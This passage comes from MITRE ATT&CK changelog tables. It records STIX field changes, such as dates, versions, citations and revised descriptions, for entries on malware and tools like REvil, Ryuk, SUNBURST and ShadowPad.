| external_references[3]['url'] | https://www.secureworks.com/research/revil-sodinokibi-ransomware | https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html |
| external_references[4]['source_name'] | Intel 471 REvil March 2020 | Secureworks REvil September 2019 |
| external_references[4]['description'] | Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020. | Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020. |
| external_references[4]['url'] | https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/ | https://www.secureworks.com/research/revil-sodinokibi-ransomware |
| external_references[5]['source_name'] | Group IB Ransomware May 2020 | Cylance Sodinokibi July 2019 |
| external_references[5]['description'] | Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020. | Cylance. (2019, July 3). Threat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020. |
| external_references[5]['url'] | https://www.group-ib.com/whitepapers/ransomware-uncovered.html | https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html |
| external_references[6]['source_name'] | Kaspersky Sodin July 2019 | Group IB Ransomware May 2020 |
| external_references[6]['description'] | Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020. | Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020. |
| external_references[6]['url'] | https://securelist.com/sodin-ransomware/91473/ | https://www.group-ib.com/whitepapers/ransomware-uncovered.html |
| external_references[8]['source_name'] | Cylance Sodinokibi July 2019 | Intel 471 REvil March 2020 |
| external_references[8]['description'] | Cylance. (2019, July 3). Threat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020. | Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020. |
| external_references[8]['url'] | https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html | https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/ |
| external_references[9]['source_name'] | Secureworks GandCrab and REvil September 2019 | Kaspersky Sodin July 2019 |
| external_references[9]['description'] | Secureworks. (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020. | Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020. |
| external_references[9]['url'] | https://www.secureworks.com/blog/revil-the-gandcrab-connection | https://securelist.com/sodin-ransomware/91473/ |
| external_references[10]['source_name'] | Talos Sodinokibi April 2019 | McAfee Sodinokibi October 2019 |
| external_references[10]['description'] | Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020. | McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020. |
| external_references[10]['url'] | https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html | https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/ |
| external_references[11]['source_name'] | McAfee Sodinokibi October 2019 | Picus Sodinokibi January 2020 |
| external_references[11]['description'] | McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020. | Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020. |
| external_references[11]['url'] | https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/ | https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware |
| external_references[13]['source_name'] | Picus Sodinokibi January 2020 | Secureworks GandCrab and REvil September 2019 |
| external_references[13]['description'] | Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020. | Secureworks. (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020. |
| external_references[13]['url'] | https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware | https://www.secureworks.com/blog/revil-the-gandcrab-connection |
| x_mitre_version | 1.2 | 2.0 |
| Old Description | New Description |
|---|---|
| [ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123) | [ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-11-23 18:54:49.190000+00:00 | 2022-03-30 20:40:21.212000+00:00 |
| description | [ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123) | [ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021) |
| external_references[4]['source_name'] | Talos ROKRAT 2 | Volexity InkySquid RokRAT August 2021 |
| external_references[4]['description'] | Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018. | Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021. |
| external_references[4]['url'] | https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html | https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/ |
| x_mitre_version | 2.2 | 2.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Talos ROKRAT 2', 'description': 'Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.', 'url': 'https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html'} | |
| Description |
|---|
| [RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-03 22:22:05.857000+00:00 | 2022-07-29 19:51:00.660000+00:00 |
| external_references[2]['source_name'] | ESET RTM Feb 2017 | Unit42 Redaman January 2019 |
| external_references[2]['description'] | Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017. | Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020. |
| external_references[2]['url'] | https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf | https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/ |
| external_references[3]['source_name'] | Unit42 Redaman January 2019 | ESET RTM Feb 2017 |
| external_references[3]['description'] | Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020. | Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017. |
| external_references[3]['url'] | https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/ | https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-04-19 19:04:55.892000+00:00 | 2022-07-28 18:55:35.991000+00:00 |
| external_references[2]['url'] | https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| Description |
|---|
| [Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg) Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-23 20:25:18.606000+00:00 | 2022-10-13 20:23:35.333000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:03:42.421000+00:00 | 2022-09-16 15:40:41.093000+00:00 |
| external_references[2]['source_name'] | Riskiq Remcos Jan 2018 | Fortinet Remcos Feb 2017 |
| external_references[2]['description'] | Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018. | Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018. |
| external_references[2]['url'] | https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/ | https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html |
| external_references[4]['source_name'] | Fortinet Remcos Feb 2017 | Riskiq Remcos Jan 2018 |
| external_references[4]['description'] | Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018. | Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018. |
| external_references[4]['url'] | https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html | https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/ |
| x_mitre_version | 1.1 | 1.3 |
| Description |
|---|
| Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | ['Responder'] | |
| x_mitre_platforms | ['Windows'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-04-06 14:42:53.334000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| [Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018) | [Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) between 2017 and 2019. [Rising Sun](https://attack.mitre.org/software/S0448) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://attack.mitre.org/software/S0448) included some source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-30 03:13:38.515000+00:00 | 2022-10-13 15:46:29.677000+00:00 |
| description | [Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018) | [Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) between 2017 and 2019. [Rising Sun](https://attack.mitre.org/software/S0448) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://attack.mitre.org/software/S0448) included some source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018) |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
| [Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-18 19:31:22.741000+00:00 | 2022-05-24 21:10:44.381000+00:00 |
| external_references[2]['source_name'] | CrowdStrike Ryuk January 2019 | Bleeping Computer - Ryuk WoL |
| external_references[2]['description'] | Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020. | Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021. |
| external_references[2]['url'] | https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ | https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ |
| external_references[4]['source_name'] | FireEye FIN6 Apr 2019 | CrowdStrike Ryuk January 2019 |
| external_references[4]['description'] | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. | Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html | https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ |
| external_references[5]['source_name'] | Bleeping Computer - Ryuk WoL | FireEye FIN6 Apr 2019 |
| external_references[5]['description'] | Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021. | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. |
| external_references[5]['url'] | https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm) | [S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2013.(Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:28:45.114000+00:00 | 2022-09-30 20:10:08.347000+00:00 |
| description | [S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm) | [S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2013.(Citation: Cylance Dust Storm) |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 20:35:47.468000+00:00 | 2022-07-18 16:01:14.539000+00:00 |
| external_references[1]['source_name'] | Proofpoint TA505 October 2019 | IBM TA505 April 2020 |
| external_references[1]['description'] | Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020. | Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. |
| external_references[1]['url'] | https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader | https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ |
| external_references[2]['source_name'] | IBM TA505 April 2020 | Proofpoint TA505 October 2019 |
| external_references[2]['description'] | Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. | Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020. |
| external_references[2]['url'] | https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ | https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader |
| x_mitre_version | 2.0 | 2.1 |
| Description |
|---|
| [SMOKEDHAM](https://attack.mitre.org/software/S0649) is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:12:16.269000+00:00 | 2022-10-18 22:07:23.251000+00:00 |
| external_references[2]['source_name'] | FireEye Shining A Light on DARKSIDE May 2021 | FireEye SMOKEDHAM June 2021 |
| external_references[2]['description'] | FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021. | FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html | https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html |
| external_references[3]['source_name'] | FireEye SMOKEDHAM June 2021 | FireEye Shining A Light on DARKSIDE May 2021 |
| external_references[3]['description'] | FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. | FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html | https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [SUNBURST](https://attack.mitre.org/software/S0559) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 15:01:16.538000+00:00 | 2022-07-29 19:52:40.476000+00:00 |
| external_references[3]['source_name'] | SolarWinds Sunburst Sunspot Update January 2021 | FireEye SUNBURST Backdoor December 2020 |
| external_references[3]['description'] | Sudhakar Ramakrishna. (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021. | FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. |
| external_references[3]['url'] | https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/ | https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html |
| external_references[5]['source_name'] | FireEye SUNBURST Backdoor December 2020 | SolarWinds Sunburst Sunspot Update January 2021 |
| external_references[5]['description'] | FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. | Sudhakar Ramakrishna. (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html | https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/ |
| x_mitre_version | 2.1 | 2.3 |
| Old Description | New Description |
|---|---|
| [SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution) | [SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-22 17:35:04.950000+00:00 | 2021-12-14 23:14:26.027000+00:00 |
| description | [SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution) | [SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution) |
| external_references[1]['source_name'] | FireEye - Synful Knock | Mandiant - Synful Knock |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html | https://www.mandiant.com/resources/synful-knock-acis |
| Description |
|---|
| [SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-15 15:17:10.012000+00:00 | 2022-10-21 15:16:57.038000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 13:14:35.741000+00:00 | 2022-10-17 19:31:36.083000+00:00 |
| external_references[2]['source_name'] | Recorded Future RedEcho Feb 2021 | FireEye APT41 Aug 2019 |
| external_references[2]['description'] | Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021. | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. |
| external_references[2]['url'] | https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf | https://content.fireeye.com/apt-41/rpt-apt41 |
| external_references[4]['source_name'] | Kaspersky ShadowPad Aug 2017 | Recorded Future RedEcho Feb 2021 |
